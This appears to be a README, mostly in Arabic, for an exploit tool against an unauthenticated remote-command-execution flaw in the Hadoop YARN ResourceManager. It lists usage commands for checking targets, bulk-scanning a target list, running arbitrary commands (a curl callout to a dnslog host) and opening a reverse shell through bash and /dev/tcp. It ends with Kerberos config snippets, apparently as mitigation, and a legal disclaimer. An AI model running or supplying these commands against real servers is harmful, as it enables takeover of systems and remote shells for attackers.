
Hadoop Yan ResourceManager unauthorized RCE
كانت هناك ثغرة وصول غير مصرح به في مكوّن ResourceManager الخاص بـ Hadoop yarn. هذه الثغرة كانت موجودة في Hadoop yarn، المكوّن الأساسي لـ Hadoop. نظرًا لأن Hadoop yarn يفتح خدمة RPC للجمهور افتراضيًا، يمكن لمهاجم عن بُعد استغلال هذه الثغرة غير المصرح بها وتنفيذ أوامر عشوائية عبر خدمة RPC، مما يتيح له السيطرة على الخادم المستهدف. نظرًا لحالة الخطر العالية والضرر الكبير لهذه الثغرة، وحقيقة أن التفاصيل قد تم الكشف عنها واستغلالها من قبل الجهات المعادية، يُنصح جميع المستخدمين الذين يستخدمون Apache Hadoop بإجراء الفحص الذاتي واتخاذ التدابير الأمنية في الوقت المناسب.
Apache Hadoop Yarn *
python3 Hadoop_Yan_RPC_RCE.py

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "curl xxx.dnslog.cn"


python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

https://nosec.org/home/detail/4905.html
https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth
<property>
<name>hadoop.security.authentication</name>
<value>kerberos</value>
<final>false</final>
<source>core-site.xml</source>
</property>...
<property>
<name>hadoop.rpc.protection</name>
<value>authentication</value>
<final>false</final>
<source>core-default.xml</source>
</property>
إعلان رسمي: لا تستخدم هذه الأداة في العمليات غير القانونية. تُستخدم هذه الأداة فقط لإجراء الفحص الذاتي الأمني من قبل موظفي الطرف الأول وموظفي الطرف الثاني. إذا استخدمها المستخدم بشكل غير قانوني، فإن المسؤولية القانونية تقع على عاتق المستخدم!!!